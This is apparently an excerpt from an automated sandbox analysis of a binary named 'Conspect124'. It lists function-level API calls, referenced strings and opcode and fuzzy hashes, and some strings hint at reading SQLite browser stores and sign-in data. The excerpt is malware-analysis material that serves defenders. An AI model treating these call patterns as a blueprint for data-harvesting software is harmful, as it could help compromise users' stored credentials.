                                      • memset.MSVCRT ref: 00413ADC
                                      • memset.MSVCRT ref: 00413AEC
                                        • Part of subcall function 00413959: wcscpy.MSVCRT ref: 00413982
                                      • memset.MSVCRT ref: 00413BD7
                                      • wcscpy.MSVCRT ref: 00413BF8
                                      • CloseHandle.KERNEL32(?,3A,?,?,?,004133E1,00000000,00000000), ref: 00413C4E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: memset$wcscpy$CloseHandleOpenProcess
                                      • String ID: 3A
                                      • API String ID: 3300951397-293699754
                                      • Opcode ID: 60cd21eba0755187b3415576207be6f8e5fc256c319da37b94ce2418303dd88c
                                      • Instruction ID: 1dd795ac5698d536b98d54c3d0ab6bca04534a71b571f2ddc62e59a9adc8dd8d
                                      • Opcode Fuzzy Hash: 60cd21eba0755187b3415576207be6f8e5fc256c319da37b94ce2418303dd88c
                                      • Instruction Fuzzy Hash: 3C514D71108341AFD720DF25DC84ADBB7E8FF84705F004A2EF59992291EB75DA44CBAA
                                      APIs
                                      • GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
                                      • wcscpy.MSVCRT ref: 0040D1B5
                                        • Part of subcall function 0040D626: memset.MSVCRT ref: 0040D639
                                        • Part of subcall function 0040D626: _itow.MSVCRT ref: 0040D647
                                      • wcslen.MSVCRT ref: 0040D1D3
                                      • GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
                                      • LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
                                      • memcpy.MSVCRT(00000000,00000002), ref: 0040D24C
                                        • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D0CC
                                        • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D0EA
                                        • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D108
                                        • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D126
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                                      • String ID: strings
                                      • API String ID: 3166385802-3030018805
                                      • Opcode ID: 07dd20e83a72376c017d688d2d43246e42d1d17d60f688a4af98472ad4cd9316
                                      • Instruction ID: f4589d763452722e7ce024d248fd6f149fceb83749f413ad0df853fa0cd60d20
                                      • Opcode Fuzzy Hash: 07dd20e83a72376c017d688d2d43246e42d1d17d60f688a4af98472ad4cd9316
                                      • Instruction Fuzzy Hash: 78418D75D003109BD7369FA8ED809263365FF48306700047EE942972A7DEB9E886CB5D
                                      APIs
                                      • memset.MSVCRT ref: 00411AF6
                                        • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040DCE6,00000000,0040DB99,?,00000000,00000208,?), ref: 00409BD5
                                      • wcsrchr.MSVCRT ref: 00411B14
                                      • wcscat.MSVCRT ref: 00411B2E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: FileModuleNamememsetwcscatwcsrchr
                                      • String ID: AE$.cfg$General$EA
                                      • API String ID: 776488737-1622828088
                                      • Opcode ID: 83214be69100a2e0159230acb683643c3f3e541604283d72b2cc5b33c3359a8e
                                      • Instruction ID: 09e7cc653f6f297407560738dd106e03d424c3973b250f6ebd227ee33dbedd02
                                      • Opcode Fuzzy Hash: 83214be69100a2e0159230acb683643c3f3e541604283d72b2cc5b33c3359a8e
                                      • Instruction Fuzzy Hash: 9611B93250022C66DF20EF51DC85ACE7378FF54754F1004ABE908B7142DB74ABC88B99
                                      APIs
                                      • memset.MSVCRT ref: 0040D8BD
                                      • GetDlgCtrlID.USER32(?), ref: 0040D8C8
                                      • GetWindowTextW.USER32(?,?,00001000), ref: 0040D8DF
                                      • memset.MSVCRT ref: 0040D906
                                      • GetClassNameW.USER32(?,?,000000FF), ref: 0040D91D
                                      • _wcsicmp.MSVCRT ref: 0040D92F
                                        • Part of subcall function 0040D76E: memset.MSVCRT ref: 0040D781
                                        • Part of subcall function 0040D76E: _itow.MSVCRT ref: 0040D78F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
                                      • String ID: sysdatetimepick32
                                      • API String ID: 1028950076-4169760276
                                      • Opcode ID: dc1af48194af82a98770d28407c75daa8b541611d8ddf07168db58443698622d
                                      • Instruction ID: 7fefccf0184427ff86f81c2eca1e08be5bb75bf3b76f29e65549559b88306b24
                                      • Opcode Fuzzy Hash: dc1af48194af82a98770d28407c75daa8b541611d8ddf07168db58443698622d
                                      • Instruction Fuzzy Hash: 061177769002197AEB10EB91DC49EDF7BACEF05750F0040BAF508D2192EB749A85CA59
                                      APIs
                                      • memcpy.MSVCRT(00000000,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B911
                                      • memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B923
                                      • memcpy.MSVCRT(?,-journal,00000008,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B93B
                                      • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B958
                                      • memcpy.MSVCRT(?,-wal,00000004,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0041B970
                                      • memset.MSVCRT ref: 0041BA3D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: memcpy$memset
                                      • String ID: -journal$-wal
                                      • API String ID: 438689982-2894717839
                                      • Opcode ID: a5b3dee4d3c614e6010b14ff521a0c16f96ee56fbca2ea6827e50279be44621a
                                      • Instruction ID: 9370885b9bf0560d7aa4477d28ce4586d78acc2621466e64c0ac2b95c9c5353a
                                      • Opcode Fuzzy Hash: a5b3dee4d3c614e6010b14ff521a0c16f96ee56fbca2ea6827e50279be44621a
                                      • Instruction Fuzzy Hash: CBA1EFB1A04606EFCB14DF69C8417DAFBB4FF04314F14826EE46897381D738AA95CB99
                                      APIs
                                      • GetDlgItem.USER32(?,000003E9), ref: 00405C27
                                      • GetDlgItem.USER32(?,000003E9), ref: 00405C3A
                                      • GetDlgItem.USER32(?,000003E9), ref: 00405C4F
                                      • GetDlgItem.USER32(?,000003E9), ref: 00405C67
                                      • EndDialog.USER32(?,00000002), ref: 00405C83
                                      • EndDialog.USER32(?,00000001), ref: 00405C98
                                        • Part of subcall function 00405942: GetDlgItem.USER32(?,000003E9), ref: 0040594F
                                        • Part of subcall function 00405942: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 00405964
                                      • SendDlgItemMessageW.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00405CB0
                                      • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00405DC1
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: Item$Dialog$MessageSend
                                      • String ID:
                                      • API String ID: 3975816621-0
                                      • Opcode ID: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                      • Instruction ID: f402ee7b04c6f37fed0081192b7321ff61b10a2f1b35431ffb531e22b2ae6a97
                                      • Opcode Fuzzy Hash: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                      • Instruction Fuzzy Hash: CC61C130214B05ABEB21AF25C886A2BB7B9FF40314F00C63EF515A76D1D778A980CF59
                                      APIs
                                      • _wcsicmp.MSVCRT ref: 00444D09
                                      • _wcsicmp.MSVCRT ref: 00444D1E
                                      • _wcsicmp.MSVCRT ref: 00444D33
                                        • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                        • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                        • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: _wcsicmp$wcslen$_memicmp
                                      • String ID: .save$http://$https://$log profile$signIn
                                      • API String ID: 1214746602-2708368587
                                      • Opcode ID: eb43a17493a81dd81a499902e520f22142985c343e331a56dc5f09596e4914e7
                                      • Instruction ID: a06b7041105a35739b636013fb05be6f811b580b4b6be30494b1fb5d54fb6444
                                      • Opcode Fuzzy Hash: eb43a17493a81dd81a499902e520f22142985c343e331a56dc5f09596e4914e7
                                      • Instruction Fuzzy Hash: CF41E6F25047018AF730AA65988176773C8DBD4329F20893FE466E27C3DB7CE841451D
                                      APIs
                                      • ??2@YAPAXI@Z.MSVCRT(0000000C), ref: 00405DE1
                                      • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00405DFD
                                      • ??2@YAPAXI@Z.MSVCRT(00000000,?), ref: 00405E23
                                      • memset.MSVCRT ref: 00405E33
                                      • ??2@YAPAXI@Z.MSVCRT(00000000,?), ref: 00405E62
                                      • InvalidateRect.USER32(?,00000000,00000000,?,?,?,?), ref: 00405EAF
                                      • SetFocus.USER32(?,?,?,?), ref: 00405EB8
                                      • ??3@YAXPAX@Z.MSVCRT(?,?), ref: 00405EC8
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: ??2@$??3@$FocusInvalidateRectmemset
                                      • String ID:
                                      • API String ID: 2313361498-0
                                      • Opcode ID: 714c78ee16b9d0c535b2ccd9b722d7140f358af2491426836a426c957dcc8526
                                      • Instruction ID: b0df241c53c05d00948b57b0581abff4a91b8671001b7eb205ccc6b71985861b
                                      • Opcode Fuzzy Hash: 714c78ee16b9d0c535b2ccd9b722d7140f358af2491426836a426c957dcc8526
                                      • Instruction Fuzzy Hash: F231C1B1500601AFEB249F6AD88692AB7A8FF14344B11853FF545E72A0DB38ED90CFD4
                                      APIs
                                      • GetSystemTime.KERNEL32(?), ref: 00418836
                                      • memcpy.MSVCRT(?,?,00000010), ref: 00418845
                                      • GetCurrentProcessId.KERNEL32 ref: 00418856
                                      • memcpy.MSVCRT(?,?,00000004), ref: 00418869
                                      • GetTickCount.KERNEL32 ref: 0041887D
                                      • memcpy.MSVCRT(?,?,00000004), ref: 00418890
                                      • QueryPerformanceCounter.KERNEL32(?), ref: 004188A6
                                      • memcpy.MSVCRT(?,?,00000008), ref: 004188B6
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: memcpy$CountCounterCurrentPerformanceProcessQuerySystemTickTime
                                      • String ID:
                                      • API String ID: 4218492932-0
                                      • Opcode ID: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                      • Instruction ID: a427a134a5f43ecd7f569dc5a6dbdc76404a49e7a1b6a3986382666b5299f542
                                      • Opcode Fuzzy Hash: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                      • Instruction Fuzzy Hash: 141184B39001286BEB00AFA5DC899DEB7ACEB1A210F454837FA15D7144E634E2488795
                                      APIs
                                        • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6EB
                                        • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6FB
                                        • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
                                        • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
                                      • memcpy.MSVCRT(?,?,00000040), ref: 0044A8BF
                                      • memcpy.MSVCRT(?,?,00000004,00000000), ref: 0044A90C
                                      • memcpy.MSVCRT(?,?,00000040), ref: 0044A988
                                        • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000040,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A422
                                        • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000008,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A46E
                                      • memcpy.MSVCRT(?,?,00000000), ref: 0044A9D8
                                      • memcpy.MSVCRT(?,?,00000020,?,?,?,?,00000000), ref: 0044AA19
                                      • memcpy.MSVCRT(00000000,?,00000020,?,?,?,?,?,?,?,00000000), ref: 0044AA4A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: memcpy$memset
                                      • String ID: gj
                                      • API String ID: 438689982-4203073231
                                      • Opcode ID: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                      • Instruction ID: 6893d0ddfb5a5ce8f484e87047b84ef7868cce638272d7e844f470f6f9013d76
                                      • Opcode Fuzzy Hash: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                      • Instruction Fuzzy Hash: 2E71D6F39083449BE310EF25D84059FB7E9ABD5348F050E2EF88997205E639DA19C797
                                      APIs
                                      • memcpy.MSVCRT(00000000,?,00000000,00000000,00000000), ref: 00430D77
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: memcpy
                                      • String ID: $, $CREATE TABLE $h\E$h\E$t\El\E
                                      • API String ID: 3510742995-2446657581
                                      • Opcode ID: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                                      • Instruction ID: 6ffa86bec377aa4089670d2183b3ec09711c7f982517375fcd2495ffcd0e8f65
                                      • Opcode Fuzzy Hash: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                                      • Instruction Fuzzy Hash: CE51CF71D00219DFCB10CF99C490AAEB7F5EF89319F21925BD841AB206D738AE45CF98
                                      APIs
                                      • GetDlgItem.USER32(?,000003E9), ref: 00405A25
                                      • SendMessageW.USER32(00000000,00001009,00000000,00000000), ref: 00405A3E
                                      • SendMessageW.USER32(?,00001036,00000000,00000026), ref: 00405A4B
                                      • SendMessageW.USER32(?,0000101C,00000000,00000000), ref: 00405A57
                                      • memset.MSVCRT ref: 00405ABB
                                      • SendMessageW.USER32(?,0000105F,?,?), ref: 00405AF0
                                      • SetFocus.USER32(?), ref: 00405B76
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: MessageSend$FocusItemmemset
                                      • String ID:
                                      • API String ID: 4281309102-0
                                      • Opcode ID: 2f4c27367ad0dcd0df6ff95742fdfb823844e6920604fec48c7e171fffcef4b8
                                      • Instruction ID: 6f3680249e95162a2c17081b35fa045d6cf646e1ea5253f38cdaf521fbeb1c86
                                      • Opcode Fuzzy Hash: 2f4c27367ad0dcd0df6ff95742fdfb823844e6920604fec48c7e171fffcef4b8
                                      • Instruction Fuzzy Hash: 86414B75900219BBDB20DF95CC85EAFBFB8FF04754F10406AF508A6291D3759A90CFA4
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: _snwprintfwcscat
                                      • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                      • API String ID: 384018552-4153097237
                                      • Opcode ID: ceefa94603245cfdc84b5d7ac4d3bb9d057f1e5f82a05c255ee601070e84ce5a
                                      • Instruction ID: 690b9c6e7bf42a1b777b65718bd5b5c6a61f2cd8039d9a9c88f4ff4500a270e2
                                      • Opcode Fuzzy Hash: ceefa94603245cfdc84b5d7ac4d3bb9d057f1e5f82a05c255ee601070e84ce5a
                                      • Instruction Fuzzy Hash: D8319E31A00209AFDF14AF55CC86AAE7BB5FF45320F10007AE804AB292D775AE49DB94
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: ItemMenu$CountInfomemsetwcschr
                                      • String ID: 0$6
                                      • API String ID: 2029023288-3849865405
                                      • Opcode ID: a1397ef96222afd124a0cc802277b776f8ca8d8a268962530e532de87b957585
                                      • Instruction ID: 35075b9e4b0179943f9cc9fcb0392e174ec026107191ec1d659f896637aaeb19
                                      • Opcode Fuzzy Hash: a1397ef96222afd124a0cc802277b776f8ca8d8a268962530e532de87b957585
                                      • Instruction Fuzzy Hash: A321AB32905300ABD720AF91DC8599FB7B8FB85754F000A3FF954A2280E779D944CB9A
                                      APIs
                                        • Part of subcall function 004055A4: GetLastError.KERNEL32(?,00000000,00405522,?,?,?,00000000,00000000,?,00408E1C,?,?,00000060,00000000), ref: 004055B9
                                      • memset.MSVCRT ref: 00405455
                                      • memset.MSVCRT ref: 0040546C
                                      • memset.MSVCRT ref: 00405483
                                      • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00405498
                                      • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004054AD
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: memset$memcpy$ErrorLast
                                      • String ID: 6$\
                                      • API String ID: 404372293-1284684873
                                      • Opcode ID: 0330b9b22cd30b5b2625a0a7e6ceceae146d238a8b356c7611763844912e7754
                                      • Instruction ID: af38dfd20ac5a94c77b7ead9800c7a3089711b207e9f3183cf3669ed78e53beb
                                      • Opcode Fuzzy Hash: 0330b9b22cd30b5b2625a0a7e6ceceae146d238a8b356c7611763844912e7754
                                      • Instruction Fuzzy Hash: 572141B280112CBBDF11AF99DC45EDF7BACDF15304F0080A6B509E2156E6398B988F65
                                      APIs
                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A088
                                      • GetDateFormatW.KERNEL32(00000400,00000001,000007C1,00000000,?,00000080), ref: 0040A0B4
                                      • GetTimeFormatW.KERNEL32(00000400,00000000,000007C1,00000000,?,00000080), ref: 0040A0C9
                                      • wcscpy.MSVCRT ref: 0040A0D9
                                      • wcscat.MSVCRT ref: 0040A0E6
                                      • wcscat.MSVCRT ref: 0040A0F5
                                      • wcscpy.MSVCRT ref: 0040A107
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                                      • String ID:
                                      • API String ID: 1331804452-0
                                      • Opcode ID: 23c89843948f9d4d6ccb23a927c15bd8e6af065920e5565f2ade9cfd678fbabf
                                      • Instruction ID: 70f18838178cd2dbc623065d80ced1a8b0c5b1489d8a310e1ceaee9f81d034e1
                                      • Opcode Fuzzy Hash: 23c89843948f9d4d6ccb23a927c15bd8e6af065920e5565f2ade9cfd678fbabf
                                      • Instruction Fuzzy Hash: 321191B284011DBFEB10AF95DC45DEF777CEB01745F104076B904B6091E6399E858B7A
                                      APIs
                                        • Part of subcall function 0040440C: FreeLibrary.KERNEL32(?,0040436D,00000000,00000000,?,0040BDCC,?,00000000,?), ref: 00404414
                                        • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                        • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                        • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                        • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                        • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                        • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                      • GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                      • GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                      • GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                      • GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                      • GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                      • String ID: advapi32.dll
                                      • API String ID: 2012295524-4050573280
                                      • Opcode ID: 65f3d33700ac9d510cc5e5eb6f652d35bee5e6265e8d5a0c26d000a27f9b730c
                                      • Instruction ID: 6b6c0a27b71384d3bff991c3c7ca7c9b0301c8735f49a3ee57333cb8f9a5f734
                                      • Opcode Fuzzy Hash: 65f3d33700ac9d510cc5e5eb6f652d35bee5e6265e8d5a0c26d000a27f9b730c
                                      • Instruction Fuzzy Hash: 5F119470440700DDE6307F62EC0AF2777A4DF80714F104A3FE541565E1DBB8A8519AAD
                                      APIs
                                      Strings
                                      • <%s>, xrefs: 004100A6
                                      • <?xml version="1.0" ?>, xrefs: 0041007C
                                      • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00410083
